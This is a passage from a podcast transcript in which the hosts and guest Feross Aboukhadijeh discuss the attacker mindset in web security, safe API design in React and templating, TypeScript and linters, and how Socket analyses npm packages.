That was pretty fun, and I put all the videos online so people can look at them now and watch them. I think a ton of people have watched them on YouTube. If you search Stanford Web Security or CS253, it has, yeah, tens of thousands.

Chris: It always blows my mind that colleges do that. It seems like your most valuable thing, the most valuable thing of college is the courses itself, and so many colleges are just like, "Nah, whatever. Just put it on YouTube." Apparently, it doesn't--

Maybe it helps get students through the door. I don't know.

Dave: I love it. I don't know. Let's democratize the information as much as possible. We really need to.

Chris: Oh, yeah. I love it too.

Dave: But yeah, it is wild. A university who pays you to make this is also just like, "Sure, put it up on YouTube."

Chris: Yeah.

Dave: Web security is a big topic. What's the first thing you think people need to know?

Chris: Exactly! What are you teaching these kids? [Laughter]

Dave: Even myself, I learned this stuff way late, and I have nonce because that's what I was told to do. You know?

Feross: [Laughter]

Dave: So, yeah, what do people need to kind of know to get started?

00:45:31

Feross: I think the most important thing is not any specific piece of knowledge but more about the mindset that you need to bring to your programming. Thinking like an attacker is the most important thing.

When you're writing code, you need to have in your mind this adversary who is going to try to break your code. As you're writing, like if you're writing a function, you have to imagine what would happen if someone passed in an argument of a different type or an argument that was longer than you expected, or something that was completely random text instead of the format you were looking for.

These kinds of things, you have to be thinking about as you're writing the code because, really, at every stage of the process, you need to think about security throughout the process. When you've done it long enough, it becomes a background process that just runs in your mind, which is like, "Okay, how could someone break this? How could someone trick me, or how could someone make this function crash? How could someone cause this to throw an exception?"

The cool thing about that mindset is it helps you more than just in writing secure code. It also helps you write better code because if you're thinking about how this could crash or what could be a condition, an error condition here that I didn't expect, you're going to end up writing better code because you're going to catch that exception. You're going to handle that case. It's not going to just throw a random exception in the middle of the function because it's something that happened that you didn't expect.

You're going to end up being a little bit more defensive in how you write things, and so I think that that's something that if you have that mindset, you'll end up asking the right questions and digging into the right things and learning what you need to learn to make your code really good. You don't need to know some specific list of things as much as just being afraid of--

Chris: That's interesting. It's like a philosophy more so than, like, "Okay, kids. This is what an SQL injection attack looks like."

Feross: Mm-hmm.

Chris: You know?

Feross: Yeah, because if you--

Chris: That's too specific?

Feross: If you think about the SQL injection example you just gave, what is going on there? It's that you wrote this code and you didn't think that that input could be different than what you thought it should be. Right? And so, it all comes back to the same thing where the attacker surprised you in some way. Right? And so, it's about, like--

And if you think of it from the other perspective, if you were an attacker and you're trying to break something -- which is kind of fun to do, by the way. I recommend breaking things. It's fun. What are you trying to do? You're trying to find a difference between the written rules of the system and the actual rules of the system.

So, the written rules are, okay, you have a log-in form. You're supposed to be able to type in a username and a password and log in. Right? But the actual rules of the system might be that you can put some SQL into the username field, and that'll actually get added to the SQL query, and it'll do a SQL injection. Right?

Chris: Hmm...

Feross: You're trying to find this gap between what they were trying to do and what you can actually do. And so, that's the thing you have to constantly be asking yourself when you're coding is what can someone do if they were really evil here? It's totally a mindset thing.

Dave: Do tools like -- I don't know. I'm just saying stuff -- but Meta Exploit and all these, there are tools you can do to automate an attacker on your site, right? Is that something we should all know how to use, just like how we all know how to use a screen reader? Is that something we should know how to use or be familiar with? Is that just overkill?

00:49:06

Feross: I personally think that's overkill. I think being familiar with what the features of your Web framework that you're using are and whether it covers a bunch of the common security things out of the box, like knowing that kind of stuff is more important. Fortunately, a lot of stuff today does the right thing for you by default, so you have to really go out of your way to do something wrong these days.

Like in React for example. You can't do an XSS on yourself unless you go out of your way to use dangerously set inner HTML. Right? It has dangerously right there in the name, so you've got to know when you're doing that.

Chris: My favorite part of that API is not only that but you have to pass it this awkward object with double underscore HTML in it. Even when I think about it and then I remember I have to craft an object just so, too, I'm like, "Ah, you're right. I'll do it the right way, God damn it."

Feross: [Laughter]

Chris: It really forces you to not use it.

Feross: Yeah. No, making hard things or dangerous things a little bit harder to do and making you think twice is actually a really important part of good API design. In other templating languages that I've used, they'll do things like two curly braces substitutes in something safely, but then three curly braces substitutes it in unsafely, and so--

Chris: Unsafely, yeah.

Feross: Yeah, and you're looking at the code. If you're looking at a pull request that someone on your team sent, are you going to really notice the difference between two and three?

Chris: No. No.

Feross: Unless you're really looking carefully. Yeah.

Dave: Mm-hmm.

Chris: I submitted a PR with that exact change just recently, and it was to make it less secure, ironically, because I wanted anchor links in a paragraph in an email and I was using Postmark, which is like an email sending service, and their little Postmark language for templating emails, that's exactly the syntax they use. Without the triple brackets, you know, but who knows what I was introducing.

Feross: Mm-hmm.

Chris: Probably some horrible exploit, but fortunately, hopefully, only we hit those endpoints. You know? [Laughter] I don't know. I maybe self-owned us a little bit.

I'm curious what you think about -- I know we're kind of butting up against the end -- of typed languages or things like that that are like, "If I do this, it makes it less hard to write bad or broken exploitable code because the language itself is forcing me to do the right stuff."

00:51:46

Feross: Yeah. I mean I avoided TypeScript for years because I didn't want to introduce a build step. I don't know. I guess I just have this hope that one day we'll be able to get rid of build steps entirely and just write code to the Web platforms.

Chris: Zero dependencies. I just mean like when you said TypeScript had like 1,500 dependencies -- or not TypeScript. Create React App or whatever it was. I immediately thought of, like, "Well, yeah, but how many dependencies are writing HTML, CSS, and JavaScript have just raw as individual files?" They have none, right?

Feross: Mm-hmm.

Chris: It's a very distant path between those two things, weirdly.

Feross: Mm-hmm.

Chris: The further we can pull it back one way, maybe that's good.

Feross: That's how I feel. Yeah, I would love us to get to a world where we can get rid of these build steps and this complexity as much as possible and just put more of this stuff into the Web platform, and so we can have lighter-weight dependencies.

But no, so that's why I've been avoiding, was avoiding, TypeScript for a long time in my career. But I do think it really helps when you're working on a team with other people. The types actually do catch quite a few bugs. And they catch it at compile time instead of at runtime, and so it's actually been quite useful. We're using it at Socket now, and I do think it can help.

The only kind of downside is it's a build step. It's kind of slow, and it also has a little bit of cruft around getting everything set up correctly. You have to have configurations and stuff. So, I haven't been really using it in my open-source projects because I don't really want to do all that ceremony in every single package.

Chris: Yeah. Yeah, fair enough.

Feross: But I do think it can really help.

I also think if you don't want to use TypeScript, you should use a linter at the very least. ESLint is great, and it actually catches more than -- you know it's for more than just style. It actually catches bugs. It actually catches, like, "Hey, you're using a variable that you didn't declare. You should probably declare your variables before you try to use them." That kind of stuff, you want to catch that as early as possible and not at runtime.

That's pretty lightweight. That doesn't add anything to your website. It doesn't go into your bundle.

Chris: Right. Right.

Feross: Everyone should be using a linter.

Chris: What I'm curious about is the connection between that mindset you were talking about of, "I'm a bad guy and I'm going to call this function, for example, with horrible parameters, extra parameters, or weird strings, or whatever." TypeScript is for you, but it's not real, right?

It eventually turns into JavaScript. So, if that function is public in any way, you can't call your own function in TypeScript with totally wrong parameters because TypeScript will be like, "Man, no!" But eventually, that turns into JavaScript in which that protection no longer exists, right?

It might lure you into this sense that you can't pass this function attacker-like stuff. It doesn't work. But you're like, "Yeah, but it does work once it's public."

Feross: Yeah, you're totally right. You're totally right. Yeah.

Chris: [Laughter]

Feross: That might lure a lot of people into a false sense of security.

Chris: I'm not sure. I just had that thought whereas a typed language that's actually typed, you can't, right? Because the language itself will be mad at you and not accept that stuff.

I'm curious of one more thing. You have to do this analysis, so feel free to stop short of giving away your amazing trade secrets or whatever. But you said you have to download all of NPM to decide what's happening, essentially, and every update too, which is, I'm sure, not a trivial task to get done - some kind of fancy watcher code and who knows - cron jobs out the wazoo.

But then you get this thing. Are you--? What, for example, are you doing? Do you run a diff to see how much has changed? Do you analyze it completely fresh each time? Are you turning stuff into ASTs and rooting through the ASTs to find gnarly stuff, or is it just string analysis? I'm just curious what kind of stuff you're doing to get this cool data.

00:55:58

Feross: Yeah, so it's all AST-based for the most part. We analyze the source code through analyzing the AST and look for the specific things that are bad or that we want to raise issues on.

We try to figure out the source of each of the issues so that when a new version comes out, if that issue is still present but it's the same instance of it, that we can not warn you again about it because it's not being newly introduced in that version. It's actually just the same thing that was there before.

We actually need to kind of track. It's almost like get diff where get tries to -- or when you move something around within a file, sometimes it can tell that it's the same block of code just moved instead of rather that it's been deleted and written out again.

Chris: Oh, clever. Right.

Feross: Yeah.

Chris: Because your goal is noise reduction, which is like a pretty excellent product choice, I think. The minute you start being obnoxious is the minute people start uninstalling your thing.

The big question, though, is did you write it in Zig? It seems like all the hot stuff is Zig-based.

Dave: Zig is--

Chris: [Laughter]

Chris: It's the new Rust.

Dave: --based on Pig and it's fast, I guess.

Chris: [Laughter] No. But you do have to make--

I'm maybe curious what you actually wrote it in because speed, you'd think, would be of the essence on analyzing all of NPM every day, or whatever you do. Or is it just JavaScript?

00:57:33

Feross: It's just JavaScript. We kind of made our own kind of analysis pipeline thing, so what it can do is it can avoid duplicating work. So, we have this thing where, once we've analyzed the package, certain parts of that analysis never need to happen again if the code hasn't changed or our analysis hasn't -- our code for analyzing it hasn't changed. And so, that stuff can get cached forever.

And then other stuff that involves the data coming from the GitHub API, like around who the maintainers are, how many stars this thing has, or how many downloads this thing has, that kind of stuff, we want to refresh that regularly, so certain analyses actually have a TTL, like a time to live, so that that stuff actually does periodically get reevaluated.

Chris: Hmm....

Feross: But some of the most heavy stuff is actually cached forever because if the code doesn't change, we don't need to do that analysis again.

Chris: I suppose, yeah because what's a crazy package? Something like the headless Chromium or whatever, right? It's a billion files. Do you have to have a blacklist for stuff like that and be like, "We're going to check all the packages except that one"?

Feross: [Laughter] No, we do analyze all of them, including that. Yeah, we're just throwing a lot of servers at it. [Laughter]

Chris: [Laughter] Nice. All right. Any final thoughts, Dave?

Dave: No, this has been cool to think about. Yeah. I think the more and more, too, I think Chris and I both are doing a bit more Node-y work, right? And so, the more you start doing that, the more it's like you get more errors and stuff.

It's like you said. There's this big signal noise, so it's hard to figure out what I need to pay attention to. It sounds like you're working on that problem, and that's awesome.

Feross: Mm-hmm.

Dave: Thank you for coming on the show today. For people who aren't following you and giving you money, how can they do that?

Feross: [Laughter] The URL for Socket is socket.dev, and it's free to use the website to look up packages, and it's also free to install the GitHub app and get your repos protected.

At some point, we will charge for private repos using it, but right now it's free while we're in beta.

Yeah, if people want to email me or reach out to me, my URL is feross.org, and I'm also @feross on Twitter. F-E-R-O-S-S.

Dave: All right. Well, thank you, Feross. Thank you, dear listener, for downloading this in your podcatcher of choice. Be sure to star, heart, favorite it up. That's how people find out about the show.

Feross: [Laughter]

Dave: And then we have YouTube. I think we're going to kick that back up again, so youtube.com/shoptalkshow.

Chris: Oh, yeah.

Dave: And then head over to -- what's the -- D-d-d-d-discord.

Chris: Patreon? There you go.

Dave: Patreon.com/shoptalkshow. We're having fun in there.

Chris: Come on in. There you go.

Dave: Chris, do you got anything else you'd like to say?

← Prev Episode Next Episode →

Guests

Feross Aboukhadijeh

Time Jump Links

Links

Transcript

Related Shows